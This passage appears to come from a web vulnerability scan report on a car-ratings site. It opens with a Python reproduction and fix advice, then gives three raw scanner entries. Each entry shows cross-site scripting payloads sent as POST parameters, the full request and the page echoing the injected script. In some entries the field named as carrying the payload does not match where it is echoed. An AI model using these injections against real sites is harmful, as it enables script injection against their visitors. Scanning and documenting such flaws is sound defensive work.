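    return '<input type="hidden" name="%s" id="%s" value="%s" />' % (name, name, shown)


def build_response(field, value, fixed):
    """Constructed stand-in for the /ratings.php page; only the echoing form matters here."""
    return ('<html><head><title>Strategic Vision - Automotive Ratings</title></head><body>'
            '<form name="ratingsSelection" action="ratings.php" method="post">'
            + render_hidden_input(field, value, fixed)
            + '<input type="hidden" name="mk1" id="mk1" value="3" /></form></body></html>')


MARKER = "netsparker(0x0009D1)"
VULNERABLE = build_response("numCars", probe(MARKER), fixed=False)
FIXED = build_response("numCars", probe(MARKER), fixed=True)

if __name__ == "__main__":
    body = build_probe_body("numCars", MARKER)
    print("Content-Length:", len(body))                      # 183, as in the report
    print("unencoded echo :", classify(VULNERABLE, MARKER))  # script
    print("encoded echo   :", classify(FIXED, MARKER))       # attribute
```

`classify` reports whether the probe escaped the attribute into a script element, which is what turns a reflected parameter into CWE-79; a response in which the marker is present but only inside a decoded attribute value is the encoded, non-exploitable case. The fix is `encode_for_attribute` applied at the echo point. Since every one of these fields only ever carries a small integer (the report sends "3" for all of them), rejecting anything that is not an integer before it is echoed is a sensible second layer, but the output encoding is what removes the class of bug regardless of what the field is expected to hold.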
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000A17)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A17)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:44:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x000A17)</script>" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000A1B)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A1B)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:44:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x000A1B)</script>" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x000A1C)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A1C)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:45:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
